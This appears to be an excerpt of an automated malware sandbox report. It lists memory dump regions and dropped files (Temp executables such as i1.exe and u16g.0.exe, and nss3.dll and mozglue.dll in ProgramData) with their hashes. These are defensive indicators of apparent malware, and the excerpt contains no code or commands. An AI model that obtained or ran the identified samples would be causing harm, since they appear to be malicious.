memory/4780-38-0x0000000007570000-0x0000000007BEA000-memory.dmp

memory/4780-39-0x0000000006420000-0x000000000643A000-memory.dmp

memory/4780-42-0x0000000073430000-0x0000000073BE0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

memory/4772-44-0x0000000073430000-0x0000000073BE0000-memory.dmp

memory/4772-45-0x0000000073430000-0x0000000073BE0000-memory.dmp

memory/4772-46-0x0000000073430000-0x0000000073BE0000-memory.dmp

memory/4772-56-0x0000000005790000-0x0000000005AE4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 953338c2ec72a2b464d681f6c15982d4
SHA1 f8fec1dafefddc45a5313996f82569ce3e327320
SHA256 ad6b800555dc69497ebdf30dbc9d55d374f58f1cc343bbc0b2488653b5c11805
SHA512 657b444d962143ee0593819ac280f9e6c13559dcd7f6fa8576706b0e11b7be54e2b966aecfbdb263037d7a5eb28552d847359216d76843a3fcb4484dce42983f

memory/4772-60-0x0000000073430000-0x0000000073BE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\i1.exe

MD5 e8fe249ed5e4a60afe3b5e0063b2aa1a
SHA1 10136812a9720946b8b3de256bd80464a7c15745
SHA256 a1aa7034c117960e045a7386df698cfaaab3bfd8b13d02bbee56b1e62e67e46f
SHA512 ff212796d65628d63474fa261f648e1b93a974aa1db70bb1edac039de9ed798f5e50debd823b407b208894ed33e320bab1a7275c5649446ff9f8e8b8bac12973

memory/4536-74-0x00000000062A0000-0x00000000065F4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c5f931c9dddc6b71152ef1b1373f7cb8
SHA1 cb54fc83f73926fb4321fcca24ac8c3db5d78f1e
SHA256 14413ea0169cbfd6798f35aed518209f245247c887797ade1fcaa05722d21e9a
SHA512 66636370f480ed15e9744019ae60a7554c250d49335710c5059a0c0aeb573fab2803889b0ffb52837283816a228b1e18d4700506316a2532c9ce815021471799

memory/4536-76-0x0000000006860000-0x00000000068AC000-memory.dmp

memory/1528-80-0x0000000000400000-0x0000000002B1E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u16g.0.exe

MD5 a33065159222d4c22e581ea419285701
SHA1 6297d390c9d8c3b8c3340d8d38d46c1bbf32d354
SHA256 ddf2f47cbc0db66b326be096b46854a6ab59a2504688077bba0bbb42c4470ae2
SHA512 2860dab79524b7db3f0b7771b8d402905a8096653d1c83e49e3827bb7cd739104848b691be16fbd898b81bfd4fcdd827fc4c8f72da6e91d565f02e59f5725f79

C:\Users\Admin\AppData\Local\Temp\u16g.1.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 0b4625e90d15ca2589c975b4103d93e6
SHA1 cefb2862a6a492c28a1d34ced18691cb4c69e0c0
SHA256 80e2d5d818f00819c6e91a2376d6e5cc71e2836269caa77827d343023bf0356d
SHA512 9e141f864f9fb48ce26204291ecb7f35128ef437cfcce77336aea7c8d890591b4c2ce223bed131ce40484500e137d28e1666c3e2cd74ac2cd7ef437459d3c6b6

memory/1528-127-0x0000000000400000-0x0000000002B1E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 c8381035bb90d56846b4b7243c3c6dca
SHA1 65981e071d75a84958f939f4dec5b2e14ebbcd42
SHA256 1d145bd610cd75a971239c2ae8badb63c63dc3487e7d156e1bb451aca143a1df
SHA512 d467f9fbd324a71b901d842c05f2236e4e82c4ad945b61f582aa5f33a817b07ddfc8799795615ad5aeb0096522f569a7018c478c08733482629f5d99a11a502d

memory/3168-139-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2312-140-0x00000167A0950000-0x00000167A4184000-memory.dmp

memory/2312-141-0x00000167C00C0000-0x00000167C01CA000-memory.dmp

memory/2312-142-0x00000167BFF00000-0x00000167BFF10000-memory.dmp

memory/2312-143-0x00000167BFF20000-0x00000167BFF2C000-memory.dmp

memory/2312-144-0x00000167BFF10000-0x00000167BFF24000-memory.dmp

memory/2312-145-0x00000167BFF80000-0x00000167BFFA4000-memory.dmp

memory/2312-146-0x00000167BFDE0000-0x00000167BFDEA000-memory.dmp

memory/2312-148-0x00000167C0430000-0x00000167C0480000-memory.dmp

memory/2312-147-0x00000167C0310000-0x00000167C03C2000-memory.dmp

memory/2312-149-0x00000167C03E0000-0x00000167C040A000-memory.dmp

memory/2312-150-0x00000167C04B0000-0x00000167C04D2000-memory.dmp

memory/2312-151-0x00000167BFDF0000-0x00000167BFDFA000-memory.dmp

memory/2312-155-0x00000167C04E0000-0x00000167C07E0000-memory.dmp

memory/2312-157-0x00000167C4EF0000-0x00000167C4EF8000-memory.dmp

memory/2312-159-0x00000167C4800000-0x00000167C480E000-memory.dmp

memory/2312-158-0x00000167C4830000-0x00000167C4868000-memory.dmp

memory/2312-160-0x00000167C4820000-0x00000167C4828000-memory.dmp

memory/2312-162-0x00000167C5720000-0x00000167C5782000-memory.dmp

memory/2312-161-0x00000167C59A0000-0x00000167C59AA000-memory.dmp

memory/2312-163-0x00000167C5780000-0x00000167C57A2000-memory.dmp

memory/2312-164-0x00000167C5EE0000-0x00000167C6408000-memory.dmp

memory/2312-167-0x00000167C57A0000-0x00000167C57AC000-memory.dmp

memory/2312-168-0x00000167C5880000-0x00000167C58F6000-memory.dmp

memory/2312-170-0x00000167C57E0000-0x00000167C57FE000-memory.dmp

memory/840-173-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

memory/840-252-0x0000000000400000-0x0000000002AF1000-memory.dmp